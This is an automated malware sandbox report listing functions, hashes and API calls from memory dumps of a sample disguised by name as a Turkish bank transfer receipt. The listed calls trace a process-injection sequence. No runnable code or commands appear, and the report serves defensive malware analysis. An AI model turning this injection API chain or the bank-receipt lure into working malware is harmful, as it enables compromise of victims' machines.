Source File: 00000000.00000002.1388540386.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fb0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID: %*&/)(#$^@!~-_$0,,q
API String ID: 0-2819669043
Opcode ID: 9aa3f5c7fe156f85e5e1028be5d680b789c2c79387e339e3d0acd6e8a984ae58
Instruction ID: f5726b9db4de5661a453562001f377e5f3ff6e32864ade894d513320cdb1b479
Opcode Fuzzy Hash: 9aa3f5c7fe156f85e5e1028be5d680b789c2c79387e339e3d0acd6e8a984ae58
Instruction Fuzzy Hash: 8A51C331B041149FD700BB78E4457EDBBB2BF89300F1484A9D9859B396CF716A09CB91

Function 06FB8E78 Relevance: 2.7, Strings: 2, Instructions: 153
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

%*&/)(#$^@!~-_, xrefs: 06FB8EA1
0,,q, xrefs: 06FB8ECA

Memory Dump Source

Source File: 00000000.00000002.1388540386.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fb0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID: %*&/)(#$^@!~-_$0,,q
API String ID: 0-2819669043
Opcode ID: dcb4423040850c068ab3e4971e0a3619296d3e7f321cddfde7c94609776a30bb
Instruction ID: 84c4851f6d70eb4504b67d9e3e69ca0b7db5e05107070ee70b8c612947801bee
Opcode Fuzzy Hash: dcb4423040850c068ab3e4971e0a3619296d3e7f321cddfde7c94609776a30bb
Instruction Fuzzy Hash: 0B51B131B001189FD700BB78E4457EEBBB2BF89300F1484A9D9855B396CF716E09CB91

Function 088B7B25 Relevance: 1.7, APIs: 1, Instructions: 248
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 088B7D66

Memory Dump Source

Source File: 00000000.00000002.1388953093.00000000088B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_88b0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: bafe1d5bdc3e50cde1768dc4a7275e06424b83d89797d63f2114314072cf97d2
Instruction ID: 1196d6d74450549904b47954ed48e9127e21d10159a8e86559629227102a25f2
Opcode Fuzzy Hash: bafe1d5bdc3e50cde1768dc4a7275e06424b83d89797d63f2114314072cf97d2
Instruction Fuzzy Hash: 1CA14A71D007199FEB10DF68C841BEEBBB2BF88711F1485A9E849A7340DB749985CF91

Function 088B7B30 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 088B7D66

Memory Dump Source

Source File: 00000000.00000002.1388953093.00000000088B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_88b0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: b39bb80327c779297e78f24e2b88f230fc760da76d6a40dabccb02832f4523e4
Instruction ID: 40c916f371adb80f32b401176937ca73ea53e700cc63bf84052f8df3fc8081cb
Opcode Fuzzy Hash: b39bb80327c779297e78f24e2b88f230fc760da76d6a40dabccb02832f4523e4
Instruction Fuzzy Hash: E4914871D007198FEB10DF68C841BEEBBB2BF88711F1485AAE849A7340DB749985CF91

Function 00F7B417 Relevance: 1.7, APIs: 1, Instructions: 203
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00F7B67E

Memory Dump Source

Source File: 00000000.00000002.1380080625.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f70000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: b306e71924ee939b8d916fedb8b85c8ff2ee56085d52325af104b24506d3615c
Instruction ID: ab71e9292a1b7272b142d9c0d1fd908f8bcc3c066ed3d2912c486e628f519a9c
Opcode Fuzzy Hash: b306e71924ee939b8d916fedb8b85c8ff2ee56085d52325af104b24506d3615c
Instruction Fuzzy Hash: 7E8168B0A00B058FDB24DF29D44579ABBF1FF89314F14892ED08AD7A51D774E846CB92

Function 00F7590D Relevance: 1.6, APIs: 1, Instructions: 99
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00F759C9

Memory Dump Source

Source File: 00000000.00000002.1380080625.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f70000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 90d3e15a758a22237f88eba5d87a5089b12346d3527b5313648aad3e6e214705
Instruction ID: c0641a245d7ca6a66bbbbeae1308e41a81817e80ffa25219aa1c44838a255a3b
Opcode Fuzzy Hash: 90d3e15a758a22237f88eba5d87a5089b12346d3527b5313648aad3e6e214705
Instruction Fuzzy Hash: 9441F1B0C00B19CFEB24CFA9C884BCEBBB5BF49704F24806AD409AB251DBB55946CF51

Function 00F744B0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00F759C9

Memory Dump Source

Source File: 00000000.00000002.1380080625.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f70000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: b33b12e5e3f8c81bfb907c718bb11bbe01c5b12baf5f5f668ec9e0340461a7f9
Instruction ID: 96d337fe03ec9d585c3578148fef84635ea170981eaadf2e14c947e91c1eded8
Opcode Fuzzy Hash: b33b12e5e3f8c81bfb907c718bb11bbe01c5b12baf5f5f668ec9e0340461a7f9
Instruction Fuzzy Hash: 6E41B171C00B19CFEB24CFA9C8847DEBBB5BF49704F20816AD409AB251DBB55945CF91

Function 088B74A0 Relevance: 1.6, APIs: 1, Instructions: 71
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 088B7538

Memory Dump Source

Source File: 00000000.00000002.1388953093.00000000088B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_88b0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 3d8bed039450365fe2e10d6faa298e38238a5842a00ca910f24cf6c6f1b0bfc5
Instruction ID: acbf82bbbd2d1d53efdf94ea74b6cef227923f97738e874c33b0dc5e16ba3387
Opcode Fuzzy Hash: 3d8bed039450365fe2e10d6faa298e38238a5842a00ca910f24cf6c6f1b0bfc5
Instruction Fuzzy Hash: F42148719003499FDB00DFA9C884BDEBBF5FF88310F14842AE959A7240D7789A54CBA0

Function 088B74A8 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 088B7538

Memory Dump Source

Source File: 00000000.00000002.1388953093.00000000088B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_88b0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: ef709677b89c138075042e10e65a259323bc2365b5552191e237d27bc097536c
Instruction ID: 1abd9f79180b1610b4bfee823748851740000e30d262e0c7dc6b63f53cf9f0f3
Opcode Fuzzy Hash: ef709677b89c138075042e10e65a259323bc2365b5552191e237d27bc097536c
Instruction Fuzzy Hash: 912127719003099FDB10DFA9C885BDEBBF5FF88310F10842AE959A7350D7789A54CBA0

Function 088B7991 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 088B7A18

Memory Dump Source

Source File: 00000000.00000002.1388953093.00000000088B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_88b0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 8b38483f4af93ed7ca6d6d27f0888a1edd759af8e127511a0f341473a8b956b6
Instruction ID: 99362db598dd16ccf78dd8c5fde759fd38be6f55157e7af974ddbfcd34371875
Opcode Fuzzy Hash: 8b38483f4af93ed7ca6d6d27f0888a1edd759af8e127511a0f341473a8b956b6
Instruction Fuzzy Hash: BA2116B18003499FDF10DFAAC885BDEBBF5FF48310F54842AE559A7240D7789A45CBA0

Function 00F7D900 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00F7D98F

Memory Dump Source

Source File: 00000000.00000002.1380080625.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f70000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 245a52a89e18f220cd40aca879140881b2873fcde6a063049437c822f1ec039f
Instruction ID: 6bc10d5640a8be4f747ff7676ca64569984fa25112c3715d9804ca90d9ec38cd
Opcode Fuzzy Hash: 245a52a89e18f220cd40aca879140881b2873fcde6a063049437c822f1ec039f
Instruction Fuzzy Hash: 4B21E2B5900309DFDB00CFA9D584ADEBBF5FB48320F14842AE958A3350D378A954DF65

Function 088B6ED3 Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 088B6F56

Memory Dump Source

Source File: 00000000.00000002.1388953093.00000000088B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_88b0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 34ac04e1b077db713506d96e41bb0f1688513f1d6a216999a7533433af7daad9
Instruction ID: 5079f7c4a7b2ba04714af1bc877b45a6ae4043dd8415c96771ad350f536f7561
Opcode Fuzzy Hash: 34ac04e1b077db713506d96e41bb0f1688513f1d6a216999a7533433af7daad9
Instruction Fuzzy Hash: 3C2134729003098FDB10DFAAC4857EEBBF4EF89210F54842AD559A7340D778AA44CBA0

Function 088B7998 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 088B7A18

Memory Dump Source

Source File: 00000000.00000002.1388953093.00000000088B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_88b0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 4e32f0e39013878a01f68b8daf69a21831462113997c19c95be5269d1290f1b3
Instruction ID: 0e0a20446c533550e0833707a51ccf3fc4a6a77e16b6644d6ba7783f749425fe
Opcode Fuzzy Hash: 4e32f0e39013878a01f68b8daf69a21831462113997c19c95be5269d1290f1b3
Instruction Fuzzy Hash: B82128718003499FDB10DFAAC884BDEFBF5FF48310F50842AE559A7240D7789944CBA0

Function 088B6ED8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 088B6F56

Memory Dump Source

Source File: 00000000.00000002.1388953093.00000000088B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_88b0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 8c033a95c1c1f3daf02586f3385168fbdcf518e9c5690a121c07ca4d77a6187b
Instruction ID: 0ae1b158be9613d91fdcd7c5962a5adc0d403a3f41c13f391b5c7c50fba969ae
Opcode Fuzzy Hash: 8c033a95c1c1f3daf02586f3385168fbdcf518e9c5690a121c07ca4d77a6187b
Instruction Fuzzy Hash: B52134719003098FDB10DFAAC4857EEBBF4AF88210F54842AD559A7340D778AA44CBA0

Function 00F7D908 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00F7D98F

Memory Dump Source

Source File: 00000000.00000002.1380080625.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f70000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: b87e6a95312407268f67387f58ec88b747d899783e00a4c043f250a921c4579e
Instruction ID: ee1e61412b8cc3ba3bd6372da3caefbbebedfea72f0a1b6ecd24d0c92860857e
Opcode Fuzzy Hash: b87e6a95312407268f67387f58ec88b747d899783e00a4c043f250a921c4579e
Instruction Fuzzy Hash: E421C4B59003499FDB10CF9AD984ADEFBF4FB48310F14841AE959A3350D374A954CF65

Function 088B73E0 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 088B7456

Memory Dump Source

Source File: 00000000.00000002.1388953093.00000000088B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_88b0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 970b246891817d0258cc6717022bdd669e533e72a9572736c50130bfd4856b3a
Instruction ID: 5115232a1dd88754cf5f03e1aa30580a1796f9711b666783f53f0ec465e6d12e
Opcode Fuzzy Hash: 970b246891817d0258cc6717022bdd669e533e72a9572736c50130bfd4856b3a
Instruction Fuzzy Hash: F71156728003499FDB10DFAAC844BDEBFF5EF89320F14841AE559A7250C775AA54CBA1

Function 088B73E8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 088B7456

Memory Dump Source

Source File: 00000000.00000002.1388953093.00000000088B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_88b0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 120d9a3b988552fda6a79b3f2d727cd8cceff4d3aef0fa560589f5cab9e5ee80
Instruction ID: 5b83cffc66187c976b31a4f9a6a3da3beea3d2aa01dc1f1fd198684dd264793a
Opcode Fuzzy Hash: 120d9a3b988552fda6a79b3f2d727cd8cceff4d3aef0fa560589f5cab9e5ee80
Instruction Fuzzy Hash: F01123728003499FDB10DFAAC844BDEBBF5EF88320F14841AE55AA7250C779A954CBA0

Function 088B6E23 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 088B6E8A

Memory Dump Source

Source File: 00000000.00000002.1388953093.00000000088B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_88b0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 9d4fbc19af1ab9dfb24622ea76407ef5a86041c6e48f4f6fca2dcbbe93c8ca89
Instruction ID: bf4bceae197a024b99eef707c5aa65d6fcca3e842b828ddf8d0b0b9532fa1577
Opcode Fuzzy Hash: 9d4fbc19af1ab9dfb24622ea76407ef5a86041c6e48f4f6fca2dcbbe93c8ca89
Instruction Fuzzy Hash: 971155B18003088FDB10DFAAC8457DEFBF4EB89224F24842AD51AA7340C779A944CBA4

Function 088B6E28 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 088B6E8A

Memory Dump Source

Source File: 00000000.00000002.1388953093.00000000088B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_88b0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: aba56fdf43d984e369b1003029d29e228f0cb31ca424687b970b48ecf3743c77
Instruction ID: e6894a3b17da8095e336d89b284e603dd19feaabc6575e8717742ceb98b7773d
Opcode Fuzzy Hash: aba56fdf43d984e369b1003029d29e228f0cb31ca424687b970b48ecf3743c77
Instruction Fuzzy Hash: F11155B18003088FDB10DFAAC4447DEFBF4AB88220F24842AC519A7240C779A944CBA4

Function 00F7B618 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00F7B67E

Memory Dump Source

Source File: 00000000.00000002.1380080625.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f70000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: b536030d69828ce7e39c1ddfec37c7ef35f74ac298b930d6534c216bf504a2fe
Instruction ID: 74f73b8f415adb039daf4c9f839d0013a8a9996d9bcaf1ef8642fa5901721d8b
Opcode Fuzzy Hash: b536030d69828ce7e39c1ddfec37c7ef35f74ac298b930d6534c216bf504a2fe
Instruction Fuzzy Hash: 7C1110B5C003498FDB10CF9AC844BDEFBF4EB89324F10846AD559A7210C379A945CFA1

Function 088BA8D8 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 088BA93D

Memory Dump Source

Source File: 00000000.00000002.1388953093.00000000088B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_88b0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 258e95c785a9a34c799d62e89635d92019f38724f1489004bbd52ddf6282797d
Instruction ID: 88b2bdb20b9a39b0c6e5c3b0c90c5ec3087f8977576fa05afbe2415a86401c6c
Opcode Fuzzy Hash: 258e95c785a9a34c799d62e89635d92019f38724f1489004bbd52ddf6282797d
Instruction Fuzzy Hash: 321103B68003499FDB14CF9AC845BDEFBF8EB48320F20841AE559A7750D375A944CFA1

Function 088B76BC Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 088BA93D

Memory Dump Source

Source File: 00000000.00000002.1388953093.00000000088B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_88b0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: e4742c6af2bcef9cbc80d0f6a9b29f19d5d0c96a8c62fe8088743e12f83bd3da
Instruction ID: 69a4915dd5907cfb652e4a7f8a81664f2c851714707e42db0e42a4ad96c9d2e2
Opcode Fuzzy Hash: e4742c6af2bcef9cbc80d0f6a9b29f19d5d0c96a8c62fe8088743e12f83bd3da
Instruction Fuzzy Hash: 1A11F2B58003499FDB10DF9AD885BDEBBF8EB48314F10841AE559A7740D375A944CFA1

Function 06F003F8 Relevance: 1.4, Strings: 1, Instructions: 168COMMON

Download Yara Rule

Strings

d, xrefs: 06F00544

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: a0d52629fccd5d6bb340c5c477021484ee4919ce96abb774b3b2a99f1a34f0b0
Instruction ID: b0324bc81f95cea6e054379c71716659a1853b138939f753e92b31f2cbda3052
Opcode Fuzzy Hash: a0d52629fccd5d6bb340c5c477021484ee4919ce96abb774b3b2a99f1a34f0b0
Instruction Fuzzy Hash: 2B617978A0060ADFCB14DF59C4C09AAF7B6FF88310B50C669D91A97656DB30F861CFA0

Function 06F05683 Relevance: 1.4, Strings: 1, Instructions: 163COMMON

Download Yara Rule

Strings

d, xrefs: 06F05775

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: ce3be378f3b20cddd9994fd967ca29298f43454d00db6b7a7d43b2b7aa9a25b8
Instruction ID: 30dbf012446cfe3723511985fdeadbb240ad0ed5db6bee113e54ce0b78cfcbbb
Opcode Fuzzy Hash: ce3be378f3b20cddd9994fd967ca29298f43454d00db6b7a7d43b2b7aa9a25b8
Instruction Fuzzy Hash: C1515D35604605CFE764CB18C58086ABBF2EFC9310725CA69D45A9B6A6CB70FC46DB90

Function 06F0A743 Relevance: 1.4, Strings: 1, Instructions: 121COMMON

Download Yara Rule

Strings

^Ct, xrefs: 06F0A84C

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID: ^Ct
API String ID: 0-694747718
Opcode ID: 8cec3cd603ee0b8bdd72eb45d5f410b3aebccd307d38ffe0b9bae681a5d784a6
Instruction ID: 7c44512ba4c61fc4f6cf9a2fffc91454e299cad45a282cb09028aaa0b74dcfe2
Opcode Fuzzy Hash: 8cec3cd603ee0b8bdd72eb45d5f410b3aebccd307d38ffe0b9bae681a5d784a6
Instruction Fuzzy Hash: C3414939B01214CFDB14DB64D494AAEB7F3EFC8710B248469E806AB395DE35ED02DB50

Function 06F056B2 Relevance: 1.3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

Strings

d, xrefs: 06F05775

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: c7902ede43e51814f868a0518767da12324a09b557c225dc0479e2d459ea0775
Instruction ID: 0dcc1a7f04e4e6146998bb21af763c6d82a62ba17c20f3e5fffed49f660a2ceb
Opcode Fuzzy Hash: c7902ede43e51814f868a0518767da12324a09b557c225dc0479e2d459ea0775
Instruction Fuzzy Hash: A1410538600A09CFDB14CB58C18086AFBF2FF88310765CA58D45A9BA66CB70FC46DB90

Function 06F4E2A0 Relevance: .6, Instructions: 603COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388411612.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f40000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdd3555320ca8f78eb9ad3f479c0675458220d52f22b4e784479905a92588707
Instruction ID: 23bd58ccd45db36f10f29f0cc1d5daf9978521f29338822493ebc35d742f5549
Opcode Fuzzy Hash: bdd3555320ca8f78eb9ad3f479c0675458220d52f22b4e784479905a92588707
Instruction Fuzzy Hash: C8424A34A00205DFDB94DF68C484AAEBBF2FF48310F158599E449AB7A6DB31ED45CB90

Function 06F06678 Relevance: .6, Instructions: 592COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17cb7d62556b5a2ac5f897b868fa6c12ad4ca63e254c12cabeb9db72d7995f2c
Instruction ID: 49d61bf5814c63bf79ae80b621fecbb1d8d0681600089e7d4d7fdf84f42a07db
Opcode Fuzzy Hash: 17cb7d62556b5a2ac5f897b868fa6c12ad4ca63e254c12cabeb9db72d7995f2c
Instruction Fuzzy Hash: 44325D75B006058FEB54DF39C484A6ABBF2FF89300B1585A9E506CB3A1DB31EC55CBA1

Function 06F0BD40 Relevance: .4, Instructions: 413COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b522481593c2edffc09dd068bfbc09b8bd9166e60ff4cbe6aa18efe55e81e39
Instruction ID: 4d42b7b06ea140c7bddd6b3ac236bf1eb9a2d4d05731796f50e07e4f656beba8
Opcode Fuzzy Hash: 4b522481593c2edffc09dd068bfbc09b8bd9166e60ff4cbe6aa18efe55e81e39
Instruction Fuzzy Hash: B2E18071F007168BEB65EBACE84066E77A2EF88740F108629E406DB394EF75DD01DB90

Function 06F0E7F0 Relevance: .4, Instructions: 399COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62a546e8b863a0e3480e957b357230d73bd1b5526eaae77db69266849edd6310
Instruction ID: 410ac03188c4a469c37ccc9f3765ed51bfc2ca8802fbc1e51360a81b0563bd4b
Opcode Fuzzy Hash: 62a546e8b863a0e3480e957b357230d73bd1b5526eaae77db69266849edd6310
Instruction Fuzzy Hash: 2BF13B75B116008FEB94DF2AC485A6ABBF2FF89310F198469E546CB3A1CB34EC41DB51

Function 06F0AEA8 Relevance: .4, Instructions: 375COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa7245798c92584689e674ba19718366015628bb75723e82defdecd136249cac
Instruction ID: 3ecdc1cc3c9ce07396ae798ef3fc67a58e0357845691a7bdf66e68242063bd7a
Opcode Fuzzy Hash: aa7245798c92584689e674ba19718366015628bb75723e82defdecd136249cac
Instruction Fuzzy Hash: D1D1D531F19226CFEBA18F68894072EB7E2AF88710F15456AD842DB395DB31CD41DBE1

Function 06F0DDD0 Relevance: .3, Instructions: 346COMMON

Download Yara Rule

Memory Dump Source

